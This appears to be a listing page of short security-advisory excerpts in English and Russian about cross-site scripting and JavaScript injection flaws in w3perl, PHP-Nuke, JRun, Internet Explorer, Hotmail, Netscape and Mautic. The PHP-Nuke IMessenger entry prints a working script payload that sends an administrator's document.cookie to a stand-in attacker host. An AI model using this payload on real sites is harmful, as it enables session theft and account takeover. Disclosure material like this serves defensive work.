Cgisecurity Paper #4: Header Based Exploitation: Web Statistical Software Threats

Hello, Below is a paper I wrote on some threats that web statistical software faces in regards to header manipulation. I've decided to include 1 product affected by this to show that this is very possible. Product: w3perl Vendor: http://www.w3perl.com Patch: http://www.w3perl.com/download/ Upgrad...

Межсайтовый скриптинг в Aktivate Shopping System (crossite scriptiong)

Можно вставить javascript в URL запроса...

Security hole in IMessenger ( PHP-Nuke )

There is a big hole in imessenger im.php. He accept javascript... if I send scriptwindow.location.href='http://www. SERVER.com/im.php?usernameto= MYNICK &subject='+ document.cookie +'&message=message&action=send' ;/script without '' to the admin, he send his cookie. PHPNuke has been alerted...

javascript в gnut (javascript injection)

Имя разделяемого файла может содержать html-таги...

Проблемы в proxomitron (crosssite scripting)

Можно вставить javascript в URL запроса...

CVE-2001-1084

Cross-site scripting vulnerability in Allaire JRun 3.0 and 2.3.3 allows a malicious webmaster to embed Javascript in a request for a .JSP, .shtml, .jsp10, .jrun, or .thtml file that does not exist, which causes the Javascript to be inserted into an error message...

Проблема в IE - скрипты в двоичных файлах

Вместо проверки поля Content-Type HTTP-заголовка IE проверяет первые байты файла и по ним определяет тип. Если в файле содержатся HTML-таги, он будет воспринят как HTML, не смотря на его соответствие другим форматам. Это позволяет вставлять javascript В двоичные файлы например картинки...

Компрометация сервера через URL (URL javascript)

В URL специального вида можно включить javascript, который будет передан атакуемым сервером клиенту. Таким образом можно в контексте клдиента получить доступ к атакуемому серверу...

hotmail.java.txt

Georgi Guninski security advisory 5, 2000 Yet another Hotmail security hole - injecting JavaScript using "jvascript:" Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski ...

javascript.hotmail.txt

Georgi Guninski security advisory 3, 2000 Yet another Hotmail security hole - injecting JavaScript in IE using "@import urljavascript:..." Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact...

netscape.viewtrack.txt

Date: Sun, 6 Jun 1999 13:15:08 +0300 From: Georgi Guninski To: [email protected] Subject: Netscape Communicator code injection in JavaScript console using "view-source:" protocol There is a bug in Netscape Communicator 4.6 Win95, 4.07 Linux probably all 4.x are affected, which allows sniffing...

Stored XSS vulnerability on Bounce Management Callback

Impact Insufficient sanitization / filtering allows for arbitrary JavaScript Injection in Mautic using the bounce management callback function. The values submitted in the "error" and "errorrelatedto" parameters of the POST request of the bounce management callback will be permanently stored and...